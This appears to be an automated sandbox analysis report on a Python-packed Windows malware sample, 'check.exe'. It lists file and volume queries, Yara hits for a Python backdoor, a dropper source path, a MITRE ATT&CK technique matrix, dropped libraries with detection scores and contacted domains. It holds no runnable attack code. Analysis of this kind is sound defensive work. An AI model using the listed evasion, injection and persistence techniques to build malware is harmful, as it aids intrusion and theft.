Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\_queue.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\charset_normalizer VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\charset_normalizer VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\charset_normalizer\md.cp313-win_amd64.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\charset_normalizer VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\charset_normalizer\md__mypyc.cp313-win_amd64.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\certifi VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\psutil VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\psutil VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\psutil\_psutil_windows.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\QtWidgets.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\QtGui.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\plugins\platforms\qminimal.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe

Code function: 4_2_00007FF6D923D010 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

4_2_00007FF6D923D010

Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe

Code function: 4_2_00007FF6D9255C00 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,

4_2_00007FF6D9255C00

Stealing of Sensitive Information

Yara detected Python BackDoor

Source: Yara match	File source: 00000005.00000003.2373391380.00000183550AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.2372124861.00000183550AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2669527004.0000026A5D2EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.2413685847.00000183550AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.2511360407.0000026A5D2EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2580123752.00000183550AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2733954233.0000025DEA117000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.2375173777.00000183550AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.2373135465.00000183550AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.2372540922.00000183550AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.2371318257.00000183550AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.2409464114.00000183550AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.2366082675.00000183550AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.2514741101.0000026A5D2EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: check.exe PID: 1008, type: MEMORYSTR

Opens network shares

Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File opened: \\Mac\shared\projects\loader\src\dropper\src\tmp\_main.py	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File opened: \\Mac\shared\projects\loader\src\dropper\src\tmp\_main.py
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	File opened: \\Mac\shared\projects\loader\src\dropper\src\tmp\_main.py

Remote Access Functionality

Yara detected Python BackDoor

Source: Yara match	File source: 00000005.00000003.2373391380.00000183550AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.2372124861.00000183550AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2669527004.0000026A5D2EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.2413685847.00000183550AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.2511360407.0000026A5D2EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2580123752.00000183550AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2733954233.0000025DEA117000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.2375173777.00000183550AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.2373135465.00000183550AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.2372540922.00000183550AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.2371318257.00000183550AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.2409464114.00000183550AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.2366082675.00000183550AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.2514741101.0000026A5D2EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: check.exe PID: 1008, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	131 Windows Management Instrumentation	1 Registry Run Keys / Startup Folder	11 Process Injection	1 Masquerading	OS Credential Dumping	1 Network Share Discovery	Remote Services	1 Archive Collected Data	12 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	1 Registry Run Keys / Startup Folder	141 Virtualization/Sandbox Evasion	LSASS Memory	2 System Time Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Native API	Logon Script (Windows)	1 DLL Side-Loading	11 Process Injection	Security Account Manager	141 Security Software Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 PowerShell	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Obfuscated Files or Information	LSA Secrets	141 Virtualization/Sandbox Evasion	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	11 Software Packing	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Timestomp	DCSync	3 File and Directory Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	44 System Information Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
download.ps1	8%	ReversingLabs	Script-PowerShell.Trojan.Powdow

Dropped Files

Source	Detection	Scanner
C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\bin\MSVCP140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\bin\MSVCP140_1.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\bin\Qt5Core.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\bin\Qt5DBus.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\bin\Qt5Gui.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\bin\Qt5Network.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\bin\Qt5Qml.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\bin\Qt5QmlModels.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\bin\Qt5Quick.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\bin\Qt5Svg.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\bin\Qt5WebSockets.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\bin\Qt5Widgets.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\bin\VCRUNTIME140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\bin\VCRUNTIME140_1.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\bin\d3dcompiler_47.dll	3%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\bin\libEGL.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\bin\libGLESv2.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\bin\opengl32sw.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\plugins\generic\qtuiotouchplugin.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\plugins\iconusers\qsvgicon.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\plugins\imageformats\qgif.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\plugins\imageformats\qicns.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\plugins\imageformats\qico.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\plugins\imageformats\qjpeg.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\plugins\imageformats\qsvg.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\plugins\imageformats\qtga.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\plugins\imageformats\qtiff.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\plugins\imageformats\qwbmp.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\plugins\imageformats\qwebp.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\plugins\platforms\qminimal.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\plugins\platforms\qoffscreen.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\plugins\platforms\qwebgl.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\plugins\platforms\qwindows.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\plugins\platformthemes\qxdgdesktopportal.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\plugins\styles\qwindowsvistastyle.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\QtCore.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\QtGui.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\QtWidgets.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\sip.cp313-win_amd64.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI57162\VCRUNTIME140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI57162\VCRUNTIME140_1.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI57162\_bz2.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI57162\_ctypes.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI57162\_decimal.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI57162\_hashlib.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI57162\_lzma.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI57162\_queue.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI57162\_socket.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI57162\_ssl.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI57162\_wmi.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI57162\charset_normalizer\md.cp313-win_amd64.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI57162\charset_normalizer\md__mypyc.cp313-win_amd64.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI57162\libcrypto-3.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI57162\libffi-8.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI57162\libssl-3.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI57162\psutil\_psutil_windows.pyd	0%	ReversingLabs

Name	IP	Active	Malicious	Antivirus Detection	Reputation
nodejs.org	104.20.22.46	true	false

URLs from Memory and Binaries

Name	Source	Malicious
https://github.com/giampaolo/psutil/issues/875.	check.exe, 00000005.00000002.2590928107.00000183564A0000.00000004.00001000.00020000.00000000.sdmp	false
